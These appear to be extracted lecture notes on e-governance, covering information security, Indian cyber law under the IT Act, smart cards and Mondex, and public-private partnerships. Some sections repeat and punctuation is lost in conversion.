The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
